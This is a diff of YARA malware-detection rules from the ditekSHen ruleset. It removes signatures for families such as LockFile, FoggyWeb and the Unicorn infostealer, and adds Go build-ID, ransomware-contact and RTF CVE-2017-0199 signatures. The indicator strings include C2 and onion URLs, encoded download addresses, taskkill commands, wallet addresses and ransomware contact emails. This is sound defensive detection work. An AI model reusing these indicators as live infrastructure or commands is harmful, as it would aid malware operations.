+		$s1 = "Go build ID: \"8C2VvDTH-MuUPx8tL42E/PWF9iuE2j_Zt0ANsTlty/c64swZ5TtuaIpHuEFmga/6sS0KWNryc-YAduDnWWO\"" ascii
+		$s2 = "Go build ID: \"UBrfJ_wztDfCHWakqvlV/LhzfkJwvKFrNhKCHtU9_/sveCupt8GVbvu6WZiyA-/GcimfL_TPl6FTPPriBDr\"" ascii
+		$s3 = "Go build ID: \"5zCy9jt7UZaIs5YPk4tt/1Yt6v7gCpDG---pRFyW-/7729nLSeKJik31ftz_Ve/Z5EVG3lWak3ynxNrJ4ih\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $f* ) and 3 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or ( 4 of ( $s* ) and 2 of ( $t* ) and 1 of ( $r* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Jennlog : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Godownloader : FILE
 {
 	meta:
-		description = "Detects JennLog loader"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "38f8cd13-f157-5cce-bf04-80c29d254144"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "da53c062-4a55-543d-b2b6-52acdf13febc"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7980-L7996"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1612-L1622"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "085a4783c7c01ec95491d9999d1835ad9ab3dc70d77b944578e097b3ffe3a627"
+		logic_hash = "e0f5ee6ade4608a8b5c5bd02bf5aef0fcb9cb1fe1cc3a9d00b1ace91e5d0d33f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "%windir%\\system32\\rundll32.exe advapi32.dll,ProcessIdleTasks" fullword wide
-		$x2 = "https://fkpageintheworld342.com" fullword wide
-		$s1 = "ExecuteInstalledNodeAndDelete" fullword ascii
-		$s2 = "ProcessExsist" fullword ascii
-		$s3 = "helloworld.Certificate.txt" fullword wide
-		$s4 = "ASCII85 encoded data should begin with '" fullword wide
-		$s5 = "] WinRE config file path: C:\\" ascii
-		$s6 = "] Parameters: configWinDir: NULL" ascii
-		$s7 = "] Update enhanced config info is enabled." ascii
+		$s1 = "Go build ID: \"1OzJqWaH4h1VtrLP-zk8/G9w32ha7_ziW1Fa-0Byj/gLtfhbXZ6i_W0e5e_tFF/ekG0n9hOcZjmwzRQnRqC\"" ascii
+		$s2 = "Go build ID: \"kKxyj14l4NhGbuhOgzef/ab_yr_pUn6q2idYdoBhn/hFAjO_Yxc_rN6mHFuHM9/SmS3qmOyJBc_4xV_qg3B\"" ascii
+		$s3 = "Go build ID: \"MiW7XJnQsBXxlBHro8GW/HMqQknRgJg-mCXomgFRt/88ccKMrfA_s6AcOJs3aM/jSUAU_l3RrMzlV6ANEYE\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) or ( all of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Lockfile : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Ranumbot : FILE
 {
 	meta:
-		description = "Detects LockFile ransomware"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "762ac376-43ff-56d2-b279-2879ce6d8542"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f368cd9d-f974-56cf-a2b5-bd300f30cedc"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7998-L8014"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1624-L1633"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28c8aa8931d599e5a1860fe2ed0b8172e709dad1a48a319858a907fa775af293"
+		logic_hash = "c3d0ba55ca2be1b11ebf1b82490c5d26f2b35958b31a7e55892e27f24bf4118f"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "LOCKFILE" fullword ascii
-		$x2 = "25a01bb859125507013a2fe9737d3c33" fullword ascii
-		$s1 = "</key>" fullword ascii
-		$s2 = "<computername>%s</computername>" fullword ascii
-		$s3 = "<blocknum>%d</blocknum>" fullword ascii
-		$s4 = "%s\\%s-%s-%d%s" fullword ascii
-		$s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide
-		$m1 = "<title>LOCKFILE</title>" ascii wide nocase
-		$m2 = "<hta:application id=LOCKFILE applicationName=LOCKFILE" ascii wide nocase
+		$s1 = "Go build ID: \"hOhuOA4W60aBBRoFQTDA/dl9DuLAgEcabYGK6ZT2t/ECsse3630jV_957OqqK3/ZRA_JRPFzxutK16zlEcM\"" ascii
+		$s2 = "Go build ID: \"NivDrAudWE-E6xtBXeww/3pv6fDzDqt4v0YxoTkPt/8vd79TNE-9Bt38ftxf_V/_GNqnqEUsRf-WTSmn8dM\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 1 of ( $m* ) ) ) or ( 1 of ( $m* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Foggyweb : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Banload : FILE
 {
 	meta:
-		description = "Attempt on hunting FoggyWeb"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "429827f7-2ccf-5c13-ac0d-1fd8b35a6740"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5955afd5-f26f-5df1-b355-b8f168b694b0"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8016-L8032"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1635-L1643"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d868501bc52ad7787d9e99927dd61e9ad9e2132f02348fc71e64666bfc0c9e15"
-		score = 50
+		logic_hash = "534de1ce161e5e27f380f96b83630aa75031f268658aa7e8ff8ecce82ed5d4cd"
+		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$u1 = "/adfs/portal/images/theme/light01/" ascii wide
-		$u2 = "/adfs/services/trust/2005/samlmixed/upload" ascii wide
-		$s1 = "ProcessGetRequest" ascii wide
-		$s2 = "ProcessPostRequest" ascii wide
-		$s3 = "UrlGetFileNames" ascii wide
-		$s4 = "GetWebpImage" ascii wide
-		$s5 = "GetWebpHeader" ascii wide
-		$s6 = "ExecuteAssemblyRoutine" ascii wide
-		$s7 = "ExecuteBinary" ascii wide
+		$s1 = "Go build ID: \"a3629ee6ab610a57f242f59a3dd5e5f6de73da40\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Apostle
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Hive : FILE
 {
 	meta:
-		description = "Attempt on hunting new variants of Apostle"
+		description = "Detects Golang Build IDs in Hive ransomware"
 		author = "ditekSHen"
-		id = "31d15111-6935-5a77-ae9a-6bee16c1d2f6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7d7f7757-de7b-52a7-aab0-8fda38a86fd1"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8034-L8043"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1645-L1653"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9acab5dadee0760431376075450f54bbb32ebed10dc928db91a44d069afc1576"
-		score = 50
-		quality = 73
-		tags = ""
+		logic_hash = "f311a3661ea3a26ebca6cd283d1e219011acfdfbb13fa8b919ca2724b9f4aae7"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$x1 = "://t.me/x4ran" ascii wide nocase
-		$x2 = "43JuFUyzfcKQwTzCTHpQoA8uLGtbwFBLyeeXoYEEU5dZLhLT1cZJDk4cytjcgQT7kdjSerJqpEp2gUcH91bjLcoq2bqik3j" ascii wide
+		$s1 = "Go build ID: \"XDub7DGmWVQ2COC6W4If/XHMqRPf2lnJUiVkG1CR6/u_MaUU0go2UUmLb_INuv/WrZSyz-WMW1st_NaM935\"" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_HUNT_Ghostemperor_Remotecontrolpayload : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nodachi : FILE
 {
 	meta:
-		description = "Attempt on hunting GhostEmperor Stage 4 Remote Control Payload"
+		description = "Detects Golang Build IDs in Nodachi"
 		author = "ditekSHen"
-		id = "d30a2aad-8bd6-5291-a31d-7dade250e57e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8045-L8052"
+		id = "9d578768-7995-5fb0-8bf1-9c2221cdef80"
+		date = "2021-01-21"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1655-L1666"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dabce4e0add0d05b4efd8e7540e4f14767c7b5fab361bd731234dd9dd844c658"
-		score = 50
+		logic_hash = "177269623e0f3850c37c6b203d9a637fa92c0ed3fa823cc8d885f28cb383bf7d"
+		score = 75
 		quality = 75
 		tags = "FILE"
 
+	strings:
+		$s1 = "Go build ID: \"3AAyhKK0wFfCYLdz5oRV/zKyiBHCsAEyDIWhaW5AW/Rb8NLT3q8A2OLm6izDGP/8G9k_gjOTX_PXKna_IMj\"" ascii
+		$s2 = "Go build ID: \"-eyFd8kbpwxUsutpqZn_/vqzQXX5Ra4qk1XHoqocW/wd-6gLzQKZyEyhVp7qOj/Jr14hyc7pLLgeIZNbfLD\"" ascii
+		$s3 = "Go build ID: \"xDSqp4KGmd0SAf5irMGh/-kA7PGjKoJcvCgsZDStn/lHeQ1LQOVyQB2NnwIwFP/-D5oEBc23ND7IGLTESdM\"" ascii
+		$s4 = "Go build ID: \"67RcwNspLH__QJrElMcB/zMJf7Go1s0ZoXqd30Lb_/NaJl4rfcuLEG5LeZ-Y4k/MzFNvW79enRRdx3LmA47\"" ascii
+
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 2 and pe.exports ( "1" ) and pe.exports ( "__acrt_iob_func" )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Unicorn : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gobrut : FILE
 {
 	meta:
-		description = "Detects Unicorn infostealer"
+		description = "Detects Golang Build IDs in GoBrut"
 		author = "ditekSHen"
-		id = "7cc8298d-abbd-5dda-bbd4-8b061095c367"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "65953012-fc84-50d0-b769-64df66d8a54b"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8077-L8107"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1668-L1676"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c4150b213c0dd88c87eb81e3ad455d8f658a57b0998bc6e394c5afac9423d9f2"
+		logic_hash = "40c305f019cb31222fa75a24315764cb5e5356afaa72aefb59916d615a8fca28"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "WinHTTP Downloader/1.0" fullword wide
-		$x2 = "[CTRL + %c]" fullword wide
-		$x3 = "\\UnicornLog.txt" fullword wide
-		$x4 = "/*INITIALIZED*/" fullword wide
-		$s1 = { 2f 00 63 00 20 00 22 00 43 00 4f 00 50 00 59 00
-               20 00 2f 00 59 00 20 00 2f 00 42 00 20 00 22 00
-               25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00
-               22 00 00 00 63 00 6d 00 64 00 2e 00 65 00 78 00
-               65 }
-		$s2 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00
-               2e 00 65 00 78 00 65 00 00 00 00 00 25 00 73 00
-               20 00 22 00 25 00 73 00 22 00 2c 00 25 00 68 00
-               73 }
-		$s3 = "%*[^]]%c%n" fullword ascii
-		$s4 = "file://%s%s%s" fullword ascii
-		$s5 = "%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$s6 = "regex_start_injects" fullword ascii
-		$s7 = "DLEXEC" fullword ascii
-		$s8 = "^((((3|1)[A-Za-z0-9]{33}))(\\s|$)|(bc1q)[A-Za-z0-9]{38}(\\s|$))" fullword ascii
-		$s9 = "^(0x)?[A-Za-z0-9]{40}(\\s|$)" fullword ascii
-		$s10 = "clipRegex" fullword ascii
-		$s11 = "%s?k=%s&src=clip&id=%s" fullword ascii
-		$s12 = "http://izuw6rclbgl2lwsh.onion/o.php" fullword ascii
+		$s1 = "Go build ID: \"sf_2_ylcjquGBe4mQ99L/aPvdLbM2z9HfoDN3RazG/8bhYeVA67N-ifbDYCDJe/UZzCu_EFL9f10gSfO4L0\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 8 of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Spectre : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Biopassdropper : FILE
 {
 	meta:
-		description = "Detects Spectre infostealer"
+		description = "Detects Golang Build IDs in BioPass dropper"
 		author = "ditekSHen"
-		id = "43b32900-8dff-5a95-bcff-d6bd17703476"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b82d34d9-7774-5f99-9d76-b5426e015981"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8109-L8124"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1678-L1686"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee041928ab5010fd5a06538f9a7cf9c72e44903fdb05f13b12362af0b326fd6f"
+		logic_hash = "3b586e886b9f901dde1c73aa07ce0d45e4ff417459f298094359ec1c1e02e522"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920233-920234"
 
 	strings:
-		$s1 = "\\../../../json.h" wide
-		$s2 = "static_cast<std::size_t>(index) < kCachedPowers.size()" fullword wide
-		$s3 = " cmd.exe" fullword wide
-		$s4 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
-		$h1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" fullword wide
-		$h2 = "----974767299852498929531610575" ascii wide
-		$h3 = "Content-Disposition: form-data; name=\"file\"; filename=\"" fullword ascii
+		$s1 = "Go build ID: \"OS0VlkdEIlcl3WDDr9Za/_oVwEipaaX6V4mEEYg2V/PytlyeIYgV65maz4wT2Y/IQvgbHv3bbLV42i10qq2\"" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $h* ) ) or ( all of ( $h* ) and 2 of ( $s* ) ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_HUNT_Blackbyte : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rhysida
 {
 	meta:
-		description = "Attempt on hunting BlackByte ransomware"
-		author = "ditekSHen"
-		id = "c07e9b83-3bbf-52c9-b9fa-ca03f285a906"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Rhysida ransomware"
+		author = "ditekShen"
+		id = "7ee0fb41-9267-5b65-ada3-229f2e390da6"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8126-L8139"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1688-L1697"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ceb71e42b888522c183af7e180bae47510fc7aa60a713aa83ffc2c98c03466f"
-		score = 50
-		quality = 57
-		tags = "FILE"
+		logic_hash = "e3e07bab2982a30a5372e6708ede6707d132d410aa5b5b1a29bdb5d06910a88e"
+		score = 75
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "WalkDirAndEncrypt" ascii wide nocase
-		$s2 = "FileEncrypt" ascii wide nocase
-		$s3 = "BlackByte." ascii wide nocase
-		$s4 = "EnumerateDirAndEncrypt" ascii wide nocase
-		$s5 = "Dismount-DiskImage" ascii wide nocase
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" ascii wide nocase
+		$s1 = "SethZemlak@onionmail.org" ascii wide nocase
+		$s2 = "JacquieKunze@onionmail.org" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector05 : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Payola
 {
 	meta:
-		description = "Detects downloader / injector (NiceProcess)"
-		author = "ditekSHen"
-		id = "857eb13b-a882-5326-b7aa-4d2fcd0b6425"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Payola ransomware"
+		author = "ditekShen"
+		id = "7c1fc06b-fc71-5679-befd-686b2e05e3a4"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8141-L8158"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1699-L1708"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5345c2b03e14b7324a13bac0da783eec8c30da18043c1b2d46162e5b511fae63"
+		logic_hash = "568141c03d14faef0cfc4f5fbdec45a5109a1ad5cbbe99e76a1db86e7ef4dc5d"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "pidhtmpfile.tmp" fullword ascii
-		$s2 = "pidhtmpdata.tmp" fullword ascii
-		$s3 = "pidHTSIG" fullword ascii
-		$s4 = "Taskmgr.exe" fullword ascii
-		$s5 = "[HP][" ascii
-		$s6 = "[PP][" ascii
-		$s7 = { 70 69 64 68 74 6d 70 66 69 6c 65 2e 74 6d 70 00
-                2e 64 6c 6c 00 00 00 00 70 69 64 48 54 53 49 47
-                00 00 00 00 ?? ?? 00 00 54 61 73 6b 6d 67 72 2e
-                65 78 65 }
+		$s1 = "pcsupport@skiff.com" ascii wide nocase
+		$s2 = "pctalk01@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Kutaki : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Xorist
 {
 	meta:
-		description = "Detects Kutaki"
-		author = "ditekSHen"
-		id = "d91812bb-4564-56b5-9757-81255b5233fb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with Xorist ransomware"
+		author = "ditekShen"
+		id = "151d182c-c60a-54dd-a3d2-b32d27521b57"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8160-L8173"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1710-L1723"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24fbc9ca6de421275813c285a8fca91cfcede48f4b4de9feda010c644f0c251f"
+		logic_hash = "5975a730ad1a1f7e54e95ec5897aa2940ccc3ed1aa8e83b38cb7ac836c233208"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 67
+		tags = ""
 
 	strings:
-		$x1 = "AASEaHR0cDovL29qb3JvYmlhLmNsdWIvbGFwdG9wL2xhcHRvcC5waHA" ascii
-		$x2 = "aHR0cDovL3RlcmViaW5uYWhpY2MuY2x1Yi9zZWMva29vbC50eHQ" ascii
-		$s1 = "wewqeuuiwe[XXXXXXX]" ascii
-		$s2 = "alt|aHR0cD" ascii
-		$s3 = "<rdf:Description about='uuid:fb761dc9-9daf-11d9-9a32-fcf1da45dca2'" ascii
-		$s4 = "<rdf:Description about='uuid:0ab54f47-96d6-11d9-a59c-cbc93330e07e'" ascii
+		$s1 = "@root_backdoor_synaptics_V" ascii wide nocase
+		$s2 = "@DosX_Plus" ascii wide nocase
+		$s3 = "@Cinoshi_Adm" ascii wide nocase
+		$s4 = "@ac3ss0r" ascii wide nocase
+		$s5 = "MCwRK1Z7K4GYHt9ZrbTR2SMCEqzqQaTbRF" ascii wide
+		$s6 = "0x334F093c9De6552AF4cC0B252dA82aC77FeB467D" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector06 : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackhunt
 {
 	meta:
-		description = "Detects downloader / injector"
-		author = "ditekSHen"
-		id = "9d8164ee-49b3-5eb1-bd1d-9437fc6f1392"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with BlackHunt ransomware"
+		author = "ditekShen"
+		id = "87613fcc-7d9a-57ba-9653-c48760dd5ef0"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8175-L8189"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1725-L1739"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e44ea8dbb94c6cd3b63d66eac3e9b3d6d5ff7d561410b8328e6c24630645305b"
+		logic_hash = "6b875d4abdedc8032f89ab3cbdf4acdc855d83b5bcc08f96b2fbc38b4a5daa7f"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 61
+		tags = ""
 
 	strings:
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
-		$s2 = "Content-Type: application/x-www-form-urlencoded" wide
-		$s3 = "https://ipinfo.io/" wide
-		$s4 = "https://db-ip.com/" wide
-		$s5 = "https://www.maxmind.com/en/locate-my-ip-address" wide
-		$s6 = "https://ipgeolocation.io/" wide
-		$s7 = "POST" fullword wide
+		$s1 = "onion746@onionmail.com" ascii wide nocase
+		$s2 = "amike1096@gmail.com" ascii wide nocase
+		$s3 = "decryptyourdata@msgsafe.io" ascii wide nocase
+		$s4 = "decryptyourdata@onionmail.org" ascii wide nocase
+		$s5 = "Teikobest@gmail.com" ascii wide nocase
+		$s6 = "Loxoclash@gmail.com" ascii wide nocase
+		$s7 = "://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Crown : FILE
+rule DITEKSHEN_INDICATOR_RTF_EXPLOIT_CVE_2017_0199_1 : CVE_2017_0199 FILE
 {
 	meta:
-		description = "Detects Crown Tech Support Scam"
+		description = "Detects RTF documents potentially exploiting CVE-2017-0199"
 		author = "ditekSHen"
-		id = "ac4551d0-a574-5287-9b37-899c736db792"
+		id = "74b3702a-7b4d-58be-ad2c-c2b1cf0ebc50"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8191-L8211"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L1-L69"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eeb36993c93d76ed118643ee417f15e1768015f72464dbabca7ae001f64a0aef"
+		logic_hash = "06b75267f00b775a6c1cd7a2022a9cfa0ea2c976f969c2c066be51449f197f58"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		snort_sid = "920251-920261"
+		tags = "CVE-2017-0199, FILE"
 
 	strings:
-		$d1 = "//prodownload.live" ascii
-		$c1 = "&uid=" ascii
-		$c2 = "&ver=" ascii
-		$c3 = "&mcid=" ascii
-		$c4 = ".php?uid=" ascii
-		$c5 = ".php?ip=" ascii
-		$s1 = "Operating System Support ID:" ascii
-		$s2 = "taskkill /IM explorer.exe -f" ascii nocase
-		$s3 = "/C taskkill /IM Taskmgr.exe -f" ascii nocase
-		$s4 = "FastSuport" fullword ascii
-		$s5 = "Support Override!" fullword wide
-		$s6 = "Support Assistance Override Activated!" fullword wide
+		$urlmoniker3 = { 45 0a 30 0a 43 0a 39 0a 45 0a 41 0a 37 0a 39 0a
+                         46 0a 39 0a 42 0a 41 0a 43 0a 45 0a 31 0a 31 0a
+                         38 0a 43 0a 38 0a 32 0a 30 0a 30 0a 41 0a 41 0a
+                         30 0a 30 0a 34 0a 42 0a 41 0a 39 0a 30 0a 42 }
+		$urlmoniker4 = { 45 0d 0a 30 0d 0a 43 0d 0a 39 0d 0a 45 0d 0a 41
+                         0d 0a 37 0d 0a 39 0d 0a 46 0d 0a 39 0d 0a 42 0d
+                         0a 41 0d 0a 43 0d 0a 45 0d 0a 31 0d 0a 31 0d 0a
+                         38 0d 0a 43 0d 0a 38 0d 0a 32 0d 0a 30 0d 0a 30
+                         0d 0a 41 0d 0a 41 0d 0a 30 0d 0a 30 0d 0a 34 0d
+                         0a 42 0d 0a 41 0d 0a 39 0d 0a 30 0d 0a 42 }
+		$urlmoniker6 = { 65 0a 30 0a 63 0a 39 0a 65 0a 61 0a 37 0a 39 0a
+                         66 0a 39 0a 62 0a 61 0a 63 0a 65 0a 31 0a 31 0a
+                         38 0a 63 0a 38 0a 32 0a 30 0a 30 0a 61 0a 61 0a
+                         30 0a 30 0a 34 0a 62 0a 61 0a 39 0a 30 0a 62 }
+		$urlmoniker7 = { 65 0d 0a 30 0d 0a 63 0d 0a 39 0d 0a 65 0d 0a 61
